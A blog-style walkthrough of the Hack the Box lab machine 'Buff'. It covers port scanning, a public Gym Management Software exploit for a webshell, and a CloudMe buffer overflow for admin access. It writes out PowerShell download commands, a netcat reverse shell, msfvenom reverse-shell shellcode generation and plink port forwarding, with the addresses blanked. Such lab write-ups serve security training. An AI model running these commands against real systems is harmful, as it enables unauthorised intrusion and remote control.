July 18, 2020

Hack the Box - Buff

Posted on July 18, 2020  •  4 minutes  • 738 words

Welcome back everyone! Today we are going to be doing the Hack the Box machine - Buff. This is listed as an easy Windows box. Let’s jump in!

As always we start with nmap scan: nmap -sC -sV -p- -oA allscan

Here are our results:

Nmap scan report for
Host is up (0.16s latency).
Not shown: 65533 filtered ports
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

We see only two ports. So we head over to port 8080 and see what is being hosted. We land on a gym page. Exploring the page a bit shows that it’s built on a software called Gym Management Software 1.0. A quick google shows us there are a few possible exploits for this software.

We will quickly mirror this exploit to our working directory with searchsploit.

Command: searchsploit -m 48506

Reading through the exploit and how it works, we simply need to supply our target URL.

Command: python2

We get back a webshell. We can now use this to quickly snag our users.txt flag.

Now that we have this flag, we can look at creating a more stable connection and look for ways to escalate. We can use nc or plink to create a connnection back to our attacking system. First we need to download those tools to this system.

Command: powershell.exe -exec bypass -C "iex(New-Object Net.WebClient).DownloadFile('', 'C:\xampp\htdocs\gym\upload\nc64.exe')"

Once thats on the system we can create our callback.

Command: .\nc.exe 7777 -e powershell.exe

Make sure we have our listener as well. nc -lcnp 7777

Once we do that we get our shell back.

Now we just download winPEAS the same as we have for other tools:

Command: iex(New-Object Net.WebClient).DownloadFile("", "C:\Temp\wp.exe")

When we try to run the file however, we are blocked.

So we just download the .bat version instead. As we sift through this data we don’t see much too exciting. As we manually browse the the contents of the machine, we noticed CloudMe_1112.exe in downloads. When we check against the winPeas scan from above we see that port 8888 is open locally, the port CloudMe uses. A quick search for any exploits of the software shows there is one on exploit-db .

The goal here is to do some port forwarding to our machine and run this exploit. To do this we’ll need to use plink. We’ll also need to create our own shellcode exploit as well.

First we’ll generate our shellcode:

Command: msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=6969 -f c > shellcode

We’ll need to put this code in our exploit code later on. Next, let’s get plink onto the target machine.

Command: curl -o C:\tmp\plink.exe

We can now create a port forwarding scenario to access remote ports locally. First start our SSH service if it’s not already running.

Command: service ssh start

Now create our port forward:

Command: .\plink.exe -ssh rootflag@ -R 1234:

This will then prompt us to login with the account. Once we do we should see a basic prompt.

Now we should have the remote port of 8888 being forwarded to our local port of 1234. If you try to curl the port, it’s not going to get back any info but that’s normally what I would do to be sure it worked.

Now that we have the ports forwarded, we can modify the exploit we found earlier - First we need to replace the shellcode inside the exploit with our generated backdoor code. That’s the code on line 31 - 52. Once we’ve pasted in our new shell code, we need to modify line 57 to reflect our port. In this case, we set or local port to 1234. So we’ll need to make that the value rather than 8888

Now with that saved. We can setup another listener to catch our reverse shell for the exploitcode that we made in the first step.

Command: nc -lvnp 6969

We can now run the exploit. If you’re on a public machine like myself, you might need to run it a few times.

Command: python2

If all goes well, your listen will catch the connection.

We now have an admin shell. We get our root.txt flag and box complete!

If you learned something in this box, send some respect my way - HTB Profile

Follow me

I hack things and tweet about things...